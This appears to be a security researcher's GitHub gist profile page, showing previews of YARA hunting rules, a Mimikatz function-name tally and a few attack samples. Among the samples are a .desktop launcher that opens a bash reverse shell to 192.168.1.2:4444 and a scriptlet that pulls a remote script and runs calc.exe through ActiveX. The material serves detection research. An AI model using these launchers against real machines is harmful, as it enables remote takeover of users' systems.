Nick Carr itsreallynick

🏠
Working from home
View GitHub Profile
@itsreallynick
itsreallynick / poké.txt
Created September 10, 2020 02:16
Pokémon Challenge - Regex Capture Them All!
Bulbasaur
Ivysaur
Venusaur
Charmander
Charmeleon
Charizard
Squirtle
Wartortle
Blastoise
Caterpie
@itsreallynick
itsreallynick / installutilpayload.yar
Last active November 19, 2019 18:09
Making this rule public
rule Hunting_InstallUtil_ProbablePayload
{
    meta:
        author = "Nick Carr - @itsreallynick"
        description = "2019-05-22 - Focusing on the underlying structure that largely cannot change outside of obfuscation"
    strings:
        $installutil = "System.Configuration.Install" nocase ascii wide
        $override_func1 = "public override string HelpText" nocase ascii wide
        $override_func2 = "public override void Uninstall" nocase ascii wide
        $override_func3 = "public override void Install" nocase ascii wide
[Desktop Entry]
Name=GoShortcutItsYourEpoch
Exec=/bin/bash -i >& /dev/tcp/192.168.1.2/4444 0>&1
Icon=http://bit.ly/icon-png
Terminal=false
Type=Application
@itsreallynick
itsreallynick / dailyworkflow.yar
Created October 24, 2019 14:39
Workflow.Compiler rules from August 2018
// Background:
rule Hunting_Workflow_Collection_XOML {
    meta:
        author = "Nick Carr - @itsreallynick"
    strings:
        $workflow1 = "<SequentialWorkflowActivity" nocase ascii wide
        $workflow2 = "Code" nocase ascii wide
    condition:
        uint16(0) != 0x5A4D and all of ($workflow*) and new_file
@itsreallynick
itsreallynick / gen_URLpersistence.yar
Last active March 10, 2020 12:47
Yara rules for .url tricks that didn't fit in a tweet
rule Methodology_Suspicious_Shortcut_Local_URL
{
    meta:
        author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)"
        description = "Detects local script usage for .URL persistence"
        reference = "https://twitter.com/cglyer/status/1176184798248919044"
    strings:
        $file = "URL=file:///" nocase
        $url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
        $url_explicit = "[InternetShortcut]" nocase
143 function Invoke-Mimidogz
140 function Invoke-Mimikatz
29 function Invoke-Mimi
10 function Chokorun
7 function Invoke-Ttest
7 function Invoke-Mimiwormz
7 function Invoke-Me
6 function Invoke-Mimiturtle
6 function Invoke-Mimimi
5 function output

Keybase proof

I hereby claim:

  • I am itsreallynick on github.
  • I am itsreallynick (https://keybase.io/itsreallynick) on keybase.
  • I have a public key ASDBI4S7vhTSnA-yeUaMckHjZTAVTcOo8qpkRA1h9UCz_wo

To claim this, I am signing this object:

<component><script src="http://goo.gl/fxtJVt"></script></component>
var itsreallycalc = new ActiveXObject("WScript.Shell").Run("calc.exe");
@itsreallynick
itsreallynick / help_Elm0d.yara
Last active August 30, 2017 03:07
Elm0d the Researcher
rule help_Elm0d
{
    meta:
        author = "@ItsReallyNick - Nick Carr"
        description = "We are STILL helping https://twitter.com/Elm0D find his files"
        reference = "https://twitter.com/ItsReallyNick/status/902702954272223232"
    strings:
        $elm0d = /[^a-z0-9]elm0d[^a-z0-9]/ nocase ascii wide
        $lol_infra = "iso9001-certificare.ro" nocase ascii wide
        $lol_website = "www.elm0d.tk" nocase ascii wide